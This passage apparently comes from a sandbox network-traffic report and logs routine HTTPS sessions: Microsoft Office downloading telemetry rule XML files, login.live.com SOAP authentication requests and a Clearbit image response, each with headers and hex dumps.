                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:22 UTC555INHTTP/1.1 200 OK
                                                                          Content-Type: image/png
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          Cache-Control: public, max-age=2592000
                                                                          Date: Sun, 08 Dec 2024 19:51:19 GMT
                                                                          x-envoy-response-flags: -
                                                                          Server: Clearbit
                                                                          strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                          x-content-type-options: nosniff
                                                                          X-Cache: Hit from cloudfront
                                                                          Via: 1.1 bd15b9fe20805eb37db52439d6b42ff4.cloudfront.net (CloudFront)
                                                                          X-Amz-Cf-Pop: BAH53-C1
                                                                          X-Amz-Cf-Id: J2T7sAZreEfYnwnPL7wuO1f53aAmghaZO3Dua78ev8iuQOt3Ez0gQw==
                                                                          Age: 3
                                                                          2024-12-08 19:51:22 UTC12797INData Raw: 33 31 66 35 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 31 bc 49 44 41 54 78 9c ec bd 09 bc 5d 45 95 2f bc d6 aa aa bd cf 74 a7 dc 9b 79 20 0c 09 89 0c 81 30 09 08 82 e2 6b 05 11 b5 05 a7 d6 6e b5 b5 d1 b6 6d a7 06 ed 4f 1a b5 11 c5 b1 a5 df d7 6a a3 b4 ad d8 e2 dc 82 02 2a 83 01 1a 91 79 12 08 31 03 21 73 72 e7 33 ec bd ab 6a ad ef 57 75 ce 4d 02 be d7 3e 7f b9 37 d7 f7 fb b2 7e 27 f7 de 9c 61 9f 5d f5 af 5a f3 5a a5 45 04 0e d0 f4 11 4d f7 0d fc ff 9d 0e 00 30 cd 74 00 80 69 a6 03 00 4c 33 1d 00 60 9a e9 00 00 d3 4c 07 00 98 66 3a 00 c0 34 d3 01 00 a6 99 0e 00 30 cd 74 00 80 69 a6 03 00 4c 33 1d 00 60 9a e9 00 00 d3 4c 07 00 98 66 3a 00 c0 34 d3 01 00 a6 99 0e 00 30 cd 74 00 80 69 26 3d
                                                                          Data Ascii: 31f5PNGIHDRL\1IDATx]E/ty 0knmOj*y1!sr3jWuM>7~'a]ZZEM0tiL3`Lf:40tiL3`Lf:40ti&=
                                                                          2024-12-08 19:51:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          71192.168.2.44983413.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:22 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:22 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:22 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 464
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                          ETag: "0x8DC582B97FB6C3C"
                                                                          x-ms-request-id: ad3e0835-e01e-0033-5701-484695000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195122Z-r1cf579d778qlpkrhC1EWRpfc800000006y00000000058v6
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:22 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          72192.168.2.44983313.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:22 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:22 UTC491INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:22 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 477
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                          ETag: "0x8DC582BB8CEAC16"
                                                                          x-ms-request-id: bfe88b8e-901e-0083-317e-49bb55000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195122Z-r1cf579d778pftsbhC1EWRa0gn00000000v0000000003vcu
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          X-Cache-Info: L1_T2
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:22 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          73192.168.2.44983613.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:22 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:22 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:22 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 494
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                          ETag: "0x8DC582BB7010D66"
                                                                          x-ms-request-id: 229463e4-b01e-0021-2a03-48cab7000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195122Z-r1cf579d778xq4f9hC1EWRx41g000000060g000000008vy3
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:22 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          74192.168.2.44983720.190.147.8443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:22 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/soap+xml
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                          Content-Length: 3592
                                                                          Host: login.live.com
                                                                          2024-12-08 19:51:22 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                          2024-12-08 19:51:23 UTC569INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                          Expires: Sun, 08 Dec 2024 19:50:22 GMT
                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                          x-ms-route-info: C510_BAY
                                                                          x-ms-request-id: 9b125c01-137b-44ae-8f10-f1f047a9c6f6
                                                                          PPServer: PPV: 30 H: PH1PEPF0001B8F2 V: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Date: Sun, 08 Dec 2024 19:51:22 GMT
                                                                          Connection: close
                                                                          Content-Length: 11390
                                                                          2024-12-08 19:51:23 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          75192.168.2.44983820.190.147.8443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:22 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/soap+xml
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                          Content-Length: 4775
                                                                          Host: login.live.com
                                                                          2024-12-08 19:51:22 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                          2024-12-08 19:51:23 UTC568INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                          Expires: Sun, 08 Dec 2024 19:50:22 GMT
                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                          x-ms-route-info: C533_BAY
                                                                          x-ms-request-id: 4bb07ad3-8050-4bc2-8cdf-0b8ac942b53a
                                                                          PPServer: PPV: 30 H: PH1PEPF0001B852 V: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Date: Sun, 08 Dec 2024 19:51:22 GMT
                                                                          Connection: close
                                                                          Content-Length: 1918
                                                                          2024-12-08 19:51:23 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          76192.168.2.44983913.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:24 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:24 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:24 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 419
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                          ETag: "0x8DC582B9748630E"
                                                                          x-ms-request-id: c060231a-801e-00ac-2403-48fd65000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195124Z-r1cf579d778d5zkmhC1EWRk6h800000006n000000000a9qc
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          77192.168.2.44984013.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:24 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:24 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:24 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 472
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                          ETag: "0x8DC582B9DACDF62"
                                                                          x-ms-request-id: f6d2a488-401e-000a-7403-484a7b000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195124Z-r1cf579d778dc6d7hC1EWR2vs800000007200000000000m9
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:24 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          78192.168.2.44984113.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:24 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:24 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:24 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 404
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                          ETag: "0x8DC582B9E8EE0F3"
                                                                          x-ms-request-id: 4232bea2-001e-008d-6044-49d91e000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195124Z-r1cf579d7789jf56hC1EWRu58800000001dg000000004p61
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:24 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          79192.168.2.44984213.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:24 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:24 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:24 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 468
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                          ETag: "0x8DC582B9C8E04C8"
                                                                          x-ms-request-id: 7ebc7efb-d01e-00ad-787a-49e942000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195124Z-r1cf579d7789jf56hC1EWRu58800000001f0000000002hde
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
